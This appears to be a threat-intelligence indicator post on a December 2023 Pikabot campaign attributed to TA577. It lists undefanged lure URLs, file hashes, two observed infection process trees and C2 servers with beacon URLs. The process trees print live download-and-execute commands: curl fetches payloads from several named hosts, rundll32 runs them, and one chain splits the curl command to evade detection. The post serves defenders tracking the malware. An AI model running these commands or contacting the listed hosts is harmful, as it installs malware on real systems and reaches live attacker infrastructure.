19.12.2023 | Pikabot | TA577 | 1.1.17-ghost
Note: the indicators below are raw and undefanged (live URLs, 64-hex SHA-256 hashes, ip:port C2 pairs). Handle them in an isolated analysis environment and do not open the URLs directly.
*************************************************
.url https://pros.cm/b9shs9/
.zip a8d0549b9288e5f98f085d17f062e6c4f95313bef262727af14983c144f3f8d6
.dll 1b62b7b138dbd3d6b8980e0257b3c35eefbde008b38cb23fb332044e8fc3f5c9
Wave 2 - JS loader switched and .dll updated; a new execution chain was observed (presumably the Exec #2 chain below)
.url https://pm-law.co/wzo7e/
.zip 99d1faf7a53e5a52870cba26786808374ffa92a12f2f70dba237bbf0af3f9774
.dll cdefe04ff6ea56f6bd8d69648e9603a8ed6db07e90349592062ce1829693bbc5
*************************************************
Exec #1 - url > zip > js > curl > .dll (observed process tree follows). The JS walks a list of download hosts, each curl writing the same output path C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll, then waits 10 s and launches the payload via rundll32 with export "Enter".
wscript.exe C:\Users\Admin\AppData\Local\Temp\Decet.js
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://allengi.com.ng/QwN/0.021897107532453885.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://allengi.com.ng/QwN/0.021897107532453885.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://newsnarayan.com/N44a38c/0.9908375425521456.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://newsnarayan.com/N44a38c/0.9908375425521456.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://nacolnist.edu.np/8CwNbP/0.13824204127652134.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://nacolnist.edu.np/8CwNbP/0.13824204127652134.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://mrenterprises.tech/OUiujYU/0.047309185337448434.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://mrenterprises.tech/OUiujYU/0.047309185337448434.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://bajarangabali.com.np/OW8i/0.4591530178148502.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://bajarangabali.com.np/OW8i/0.4591530178148502.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://easycartbd.com/5pj6O/0.7525996060696272.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://easycartbd.com/5pj6O/0.7525996060696272.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c timeout 10 & rundll32 C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll,Enter
rundll32 C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll,Enter
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://empreenda.vc/VjX/0.20412468885981988.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://empreenda.vc/VjX/0.20412468885981988.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
timeout 10
SearchProtocolHost.exe
WerFault.exe -u -p 3620 -s 992
WerFault.exe -pss -s 200 -p 3620 -ip 3620
*************************************************
Exec #2 - url > zip > js > curl > .dll (observed process tree follows). Here the JS deletes itself, then assembles the curl command into a .bat in two fragments ("cu" then "rl https://...") - presumably to evade simple command-line pattern matching - downloads with --ssl-no-revoke --insecure --location, renames the file and runs it via rundll32 with export "Enter".
wscript.exe C:\Users\Admin\AppData\Local\Temp\Novxa.js
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Novxa.js
cmd.exe /c echo|set /p="cu" > C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
cmd.exe /S /D /c echo
cmd.exe /S /D /c set /p=cu 1> C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
cmd.exe /c echo rl https://empreenda.vc/VjX/920408445 --output C:\Users\Admin\AppData\Local\Temp\sint.q --ssl-no-revoke --insecure --location >> C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
curl https://empreenda.vc/VjX/920408445 --output C:\Users\Admin\AppData\Local\Temp\sint.q --ssl-no-revoke --insecure --location
cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
cmd.exe /c ren C:\Users\Admin\AppData\Local\Temp\sint.q quo.k
rundll32.exe C:\Users\Admin\AppData\Local\Temp\quo.k Enter
*************************************************
**** .dll distribution URLs (payload download hosts) ****
https://bajarangabali.com.np/OW8i/0.4591530178148502.dat
https://nacolnist.edu.np/8CwNbP/0.13824204127652134.dat
https://newsnarayan.com/N44a38c/0.9908375425521456.dat
https://mrenterprises.tech/OUiujYU/0.047309185337448434.dat
https://allengi.com.ng/QwN/0.021897107532453885.dat
https://empreenda.vc/VjX/0.20412468885981988.dat
https://easycartbd.com/5pj6O/0.7525996060696272.dat
*************************************************
C2 servers (ip:port). Two beacon configurations were observed: the first ip:port list is followed by its /GarbureRustred/ beacon URLs, the second list by its /Pashaship/ beacon URLs; several IPs appear in both sets.
154.221.30.136:13724
149.28.100.66:5243
172.232.54.192:2224
78.141.200.111:5938
45.56.71.218:13724
65.20.85.39:2967
45.76.96.172:2223
154.211.12.126:2967
45.76.119.22:13724
172.232.189.166:1194
51.161.81.190:13721
https://154.221.30.136:13724/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://149.28.100.66:5243/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://172.232.54.192:2224/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://78.141.200.111:5938/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://45.56.71.218:13724/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://65.20.85.39:2967/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://45.76.96.172:2223/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://154.211.12.126:2967/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://45.76.119.22:13724/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://172.232.189.166:1194/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://51.161.81.190:13721/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
155.138.140.156:13720
45.76.119.22:13724
64.176.13.28:2083
45.33.15.215:2967
172.232.188.4:2226
69.164.213.141:5631
70.34.196.219:2226
172.232.54.192:2224
154.211.12.126:2967
154.221.30.136:13724
95.179.247.197:13782
172.232.189.166:1194
45.56.71.218:13724
78.141.200.111:5938
208.76.221.253:13724
216.238.79.12:2221
78.141.223.212:1194
45.76.22.139:13786
149.28.100.66:5243
https://155.138.140.156:13720/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://45.76.119.22:13724/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://64.176.13.28:2083/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://45.33.15.215:2967/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://172.232.188.4:2226/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://69.164.213.141:5631/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://70.34.196.219:2226/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://172.232.54.192:2224/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://154.211.12.126:2967/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://154.221.30.136:13724/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://95.179.247.197:13782/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://172.232.189.166:1194/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://45.56.71.218:13724/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://78.141.200.111:5938/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://208.76.221.253:13724/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://216.238.79.12:2221/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://78.141.223.212:1194/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://45.76.22.139:13786/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://149.28.100.66:5243/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
*************************************************